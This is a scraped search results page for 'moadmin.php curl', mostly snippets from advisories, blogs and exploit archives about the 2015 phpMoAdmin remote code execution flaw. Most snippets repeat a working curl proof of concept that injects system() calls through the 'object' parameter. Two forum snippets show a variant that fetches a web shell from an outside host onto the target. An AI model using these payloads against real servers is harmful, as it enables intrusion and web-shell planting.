Umuwa Home
  Web     Image     Video     News  
 
Showing results for moadmin.php curl

    Web Results
 
 
Full Disclosure: PHPMoAdmin Unauthorized Remote Code ...  
 
seclists.org
Mar 4, 2015 ... PHPMoAdmin Unauthorized Remote Code Execution (0-Day) ... 3000usd lolz $ curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit" ...  
 
 
 
Many security issues in phpMoAdmin (0-day) Issue #26 ...  
 
https://github.com/MongoDB-Rox/phpMoAdmin-MongoDB-Admin...
curl "http://localhost/phpmoadmin/moadmin.php" -d "object=0;system('whoami');exit" Any other problems? Many. Because the check for a valid session is too late you can play with many direct links. Like dropping databases you know or guess there name:  
 
 
 
Zero-Day Vulnerability Found in MongoDB Administration Tool ...  
 
blog.trendmicro.com
Mar 6, 2015 ... phpMoAdmin (short for PHP MongoDB administration tool) is a free and open ... curl "http://xyz /moadmin.php" -d "object=1;system('id');exit".  
 
 
 
oss-security - Re: CVE request: PHPMoAdmin Unauthorized ...  
 
www.openwall.com
Mar 4, 2015 ... ... execution > vulnerability in PHPMoAdmin <http://www.phpmoadmin.com/> > curl "http://example.com/moadmin.php"; -d "object=1;system('id') ...  
 
 
 
PHPMoAdmin /<b>moadmin.php</b> (0-Day) POC ...  
 
www.haihai520.com/news/294.html
curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" POST /moadmin/moadmin.php HTTP/1.1 . Host: 192.168.33.10 . User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 .  
 
 
 
CVE request: PHPMoAdmin Unauthorized Remote Code ... - Gmane  
 
comments.gmane.org
Mar 4, 2015 ... CVE request: PHPMoAdmin Unauthorized Remote Code Execution ... thanks. curl "http://example.com/moadmin.php"; -d "object=1;system('id') ...  
 
 
 
ITechLounge.net  
 
www.itechlounge.net
Using cURL, you can easily grab some information about the server who's running a .... The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows ...  
 
 
 
PHPMoAdmin Remote Code Execution Packet Storm  
 
packetstormsecurity.com/files/130638/phpmoadmin-exec.txt
$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2 ... Filename: moadmin.php 1. create new moadminComponent object 1977: $mo = new moadminComponent;  
 
 
 
Web : How to get Web site server information | ITechLounge.net  
 
www.itechlounge.net
Feb 21, 2015 ... Using cURL, you can easily grab some information about the server who's ... The saveObject function in moadmin.php in phpMoAdmin 1.1.2 ...  
 
 
 
Someone was trying to sale this shit for 3000usd lolz | Zero ...  
 
www.heise.de/security/news/foren/S-Someone-was-trying-to...
$ curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac ...  
 
 
 
phpMoAdmin - MongoDB GUI administration tool for PHP, built on ...  
 
www.phpmoadmin.com
Nothing to configure - place the moadmin.php file anywhere on your site and it just works! Fast AJAX-driven XHTML 1.1 interface operates consistently in every ...  
 
 
 
Security Intelligence | TrendLabs - Trend Micro - Part 2  
 
blog.trendmicro.com/trendlabs-security-intelligence/page/2
Today Microsoft released their monthly Patch Tuesday posting, with a total of 14 security bulletins that include 5 bulletins that were listed as Critical.  
 
 
 
phpMoAdmin-MongoDB-Admin-Tool-for-PHP/<b>moadmin.php</b> at ...  
 
github.com
Sep 25, 2013 ... phpMoAdmin-MongoDB-Admin-Tool-for-PHP - MongoDB administration tool for PHP built on a stripped-down version of the Vork ...  
 
 
 
, PHPMoAdmin - Code Execution Issue  
 
advisories.criticalwatch.com/post/112703802412/phpmo...
PHPMoAdmin - Code Execution Issue Independent Researcher( PHPMoAdmin-SA-03/04/2015 - Mar 04 2015 12:00AM ) ##### ---- _ ----_ -_| / \|_...  
 
 
 
modules_php - Documentation Ubuntu Francophone  
 
doc.ubuntu-fr.org
Modules pour PHP. php-pear. php5-intl. php5-cli. php5-imagick. php5-gd. php5-sqlite. php5-mongo. php5-xsl. php5-mcrypt. php5-curl. php5-zip. php5-imap.  
 
 
 
siph0n.net  
 
siph0n.net/download.php?id=3735
... ===== Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment : Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent ...  
 
 
 
<b>cURL</b> + PHP5 + Ubuntu - Kotoblog  
 
kotoblog.pp.ua
15 окт 2011 ... sudo apt-get install curl libcurl3 libcurl3-dev php5-curl php5-mcrypt. После этого в ... Import mongo collections dump · Work with doctrine ...  
 
 
 
Zero-Day Vulnerability Found in MongoDB Administration Tool ...  
 
herrymorison.tistory.com/2054
The way moadmin.php uses the eval function in the code allows attacker to execute shell commands e.g. system, eval, exec, etc. There are two execution paths for this vulnerability. ... curl "http://xyz /moadmin.php" -d "object=1;system('id'); ...  
 
 
 
PHPMoAdmin Remote Code Execution - Intelligent Exploit  
 
www.intelligentexploit.com/view-details.html?id=20846
... ===== Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment : Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent ...  
 
 
 
PHPMoAdmin Remote Code Execution Packet Storm  
 
packetstormsecurity.com/files/130638/PHPMoAdmin-Remote...
$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 ...  
 
 
 
PHPMoAdmin Remote Code Execution  
 
https://rstforums.com/forum/98185-phpmoadmin-remote-code...
If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed.  
 
 
 
oss-security - CVE request: PHPMoAdmin Unauthorized Remote ...  
 
www.openwall.com/lists/oss-security/2015/03/04/4
curl "http://example.com/moadmin.php"; -d "object=1;system('id');exit" Original advisory: http://seclists.org/fulldisclosure/2015/Mar/19 - -- Henri Salo -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJU9rXRAAoJECet96ROqnV0RAsP/RfOy2iFTxJKdfhQMQb+EXLZ ...  
 
 
 
PHPMoAdmin Remote Code Execution | Exploit Archive  
 
exploitarchive.com/phpmoadmin-remote-code-execution
$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7. POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac ...  
 
 
 
MongoDB phpMoAdmin ...  
 
bluereader.org/article/20113863
~ curl "http://test.knowsnec-demo.com/moadmin.php" -d "object=1;print(md5(11111));exit;" Notice: Undefined index: collection in /home/public_html/moadmin.php on line 789 b0baee9d279d34fa1dfd71aadb908c3f%  
 
 
 
PHPMoAdmin Remote Code Execution - CXSecurity.com  
 
cxsecurity.com/issue/WLB-2015030018
$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac ...  
 
 
 
Zero-Day Vulnerability Found in MongoDB Administration Tool ...  
 
www.lucadonettidontin.it/blog/zero-day-vulnerability...
Zero-Day Vulnerability Found in MongoDB Administration Tool phpMoAdmin; Protective Acrylic Case with Fan Hole for Raspberry Pi 2 Model B & B+ – Red + Transparent  
 
 
 
Improving network security through full disclosure ()  
 
comments.gmane.org/gmane.comp.security.fulldisclosure/1659
... ===== Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ===== (Continue reading) Permalink | Reply | Return. Return to gmane.comp.security.fulldisclosure. Advertisement ...  
 
 
 
Ruby Download File From Website  
 
www.gtadoubles.com/recipes/ruby-download-file-from-website
blizzard updater this download is not authorized Free Download 21165 po ruby mep 000133 survival craft norsafe link Below. You can download by copy from Direct Download file or Source url below.  
 
 
 
i am inside nothing: [FD] PHPMoAdmin Unauthorized Remote Code ...  
 
www.insidenothing.com/2015/03/fd-phpmoadmin-unauthorized...
... ===== Someone was trying to sale this shit for 3000usd lolz $ curl "http ://ift.tt/1DI7dpd" -d "object=1;system('id');exit ... ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192 .168.33.10 User-Agent: Mozilla/5.0 ...  
 
 
 
MongoDB ...  
 
blog.trendmicro.co.jp/archives/11019
この脆弱性は、「moadmin.php」という PHPファイルに存在します。 ... curl "http://xyz /moadmin.php" -d "object=1;system('id');exit"  
 
 
 
MongoDB phpMoAdmin_ ...  
 
www.hktianya.com/post/34.html
$ curl "http://path.to/moadmin.php";-d "object=1;system('id');exit" [+] Proof-of-Concept === === === === === === === === === === === === === === === === === === === === PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 . POST / moadmin / moadmin. php HTTP / 1.1. Host: 192.168.33.10.  
 
 
 
Trend-Micro | RDK web development  
 
rdksoftware.com/aggregator/sources/4
RDK web development. Feed aggregator › Sources. ... The way moadmin.php uses the eval function in the code allows attacker to execute shell commands e.g. system, eval, exec, etc. ... curl "http://xyz /moadmin.php" -d "object=1;system('id');exit"  
 
 
 
PHPMoAdmin Remote Code Execution(POC) -- WooYun( ...  
 
zone.wooyun.org/content/18908
curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0  
 
 
 
=&gt; ~ Cyber Tool-Booter ~=&gt;~IP Tools, &lt;= Skype Resolver, GEO ...  
 
globalhacking.in/cyber-tool-booter-ip-tools-skype-re...
Shell URL: http://vps1.cowpunks.nl/cms/lol.php?y=/home/cms/web/ POC Code: curl "vulnerablesite.com/moadmin.php" -d "object=1;system('wget http://myshell.com/shell.txt -O shell.php; ls');exit" Shit exploit, but it works. Skype Resolver Not Working?  
 
 
 
MongoDB phpMoAdmin  
 
www.secpulse.com/archives/5081.html
大约2个星期前,有超过40000家企业的MongoDB被发现易受黑客的攻击,而就在今天由于黑市上流传的一个高危0day漏洞 一次将MongoDB的用户置于了危险境地。 科普:MongoDB与phpMoAdmin MongoDB是IT行业中流行的一种开源NoSQL数据库,其 ...  
 
 
 
PHP Memcached and autocomplete | William Jiang  
 
https://williamjxj.wordpress.com/2013/01/09/php-memc...
moadmin.php is better than phpmemcachedadmin. Since both of them are hard to track and debug, so a good monitoring GUI tool is very important during developing and maintaining. MongoDB stores persistent data, the data is kept physically in disk: hash files ;  
 
 
 
memcached | William Jiang  
 
https://williamjxj.wordpress.com/tag/memcached
moadmin.php is better than ... auto scraping backup bash blog Catalyst CDN centOS cheat sheet checkbox composer Content delivery network Coreseek crontab css css3 cURL cvs design pattern dreamweaver drupal git html5 https java javascript javascript Patterns joomla jquery lamp linux mdb2 ...  
 
 
 
MongoDB phpMoAdmin |  
 
bluereader.org/article/13489027
... ===== Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent ...  
 
 
 
- MongoDB phpMoAdmin Zero-day  
 
forum.antichat.net/thread422877.html
This is a discussion forum by Antichat.ru. Официальный форум АНТИЧАТ.РУ  
 
 
 
IT  
 
jfghery765.hotcom-web.com/rss/jpn/contents6/it3.php
図2:moadmin.php 内の脆弱性を抱えたコード(パラメータ「object ... curl "http://xyz /moadmin.php" -d "object=1;system('id');exit"  
 
 
 
Netcat Reverse Shell Android App | global hacking  
 
globalhacking.in/netcat-reverse-shell-android-app.html
Shell URL: http://vps1.cowpunks.nl/cms/lol.php?y=/home/cms/web/ POC Code: curl "vulnerablesite.com/moadmin.php" -d "object=1;system('wget http://myshell.com/shell.txt -O shell.php; ls');exit" Shit exploit, but it works.  
 
 
 
MongoDB phpMoAdminEXP ...  
 
www.cnxhacker.com/2015/03/04/7654.html
在moadmin.php文件第692行的saveObject函数中,将$obj直接带入了eval ... $ curl "http://localhost/moadmin.php?collection=1"-d "object=1;phpinfo();exit"  
 
 
 
PHPMoAdmin Remote Code Execution - ...  
 
www.s3c-k.net/vb/t1426.html
PHPMoAdmin Remote Code Execution مكتبة الثغرات ... فرسان الحماية | بيت الهكر السني  
 
 
 
Zero-Day Sicherheitslcke in der MongoDB-Verwaltung | blog ...  
 
blog.trendmicro.de/zero-day-sicherheitsluecke-in-der...
Die Schwachstelle liegt in der moadmin.php-Datei. Aufgrund der Art und Weise, wie moadmin.php die eval-Funktion im Code nutzt, können Angreifer Shell-Befehle wie system, eval, exec etc. ausführen. ... curl “http://xyz /moadmin.php” -d “object=1; ...  
 
 
 
www.kilnerparkdayclinic.co.za  
 
www.kilnerparkdayclinic.co.za/awstats/data/awstats032015...
... 20150308235127 curl/7.35.0 20150303114044 Mozilla/5.0_(BlackBerry;_U ... BEGIN_SIDER_404 174 /backup/bigdump.php 1 - /awstats/data/wp-admin/admin-ajax.php 1 - /tmp/php.class.php 1 - /mongo/moadmin.php 1 - /admin/bigdump.php 1 - /admin/tiny_mce/plugins/tinybrowser/readme.txt 1 ...  
 
 
 
MongoDB phpMoAdminEXP  
 
bobao.360.cn/learning/detail/274.html
在moadmin.php文件第692行的saveObject函数中,将$obj直接带入了eval ... 利用漏洞 $ curl "http://localhost/moadmin.php?collection=1" -d "object=1;phpinfo();exit"  
 
 
 
MongoDB phpMoAdmin -  
 
www.tuicool.com/articles/bmQBje
... ===== Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment : Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent ...  
 
 
 
MongoDB phpMoAdmin EXP ...  
 
www.heishou.com.cn/read-htm-tid-144321.html
$ curl "http://localhost/moadmin.php?collection=1" -d "object=1;phpinfo();exit" 修复方案 建议 ... 修复方案 建议在开发者修复该漏洞前停用phpMoAdmin。 或者使用htaccess对moadmin.php 文件做访问 ...  
 
 
 
MongoDB phpMoAdmin ...  
 
blog.knownsec.com/2015/03/mongodb-management-programm-p...
~ curl "http://test.knowsnec-demo.com/moadmin.php?db=admin&action=listRows&collection=zzz&find=array(1);print(md5(111));exit;" 698d51a19d8a121ce581499d7b701668% 修复方案:  
 
 
 
PHPMoAdmin ...  
 
www.nsfocus.net/vulndb/29371
$ curl "http://path.to/moadmin.php"-d "object=1;system('id');exit" [+] Proof-of-Concept ===== PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac ...  
 
 
 


No more results ...
Copyright © 2016 Umuwa. All Rights Reserved. About us / Privacy Policy / Sitemap Most searched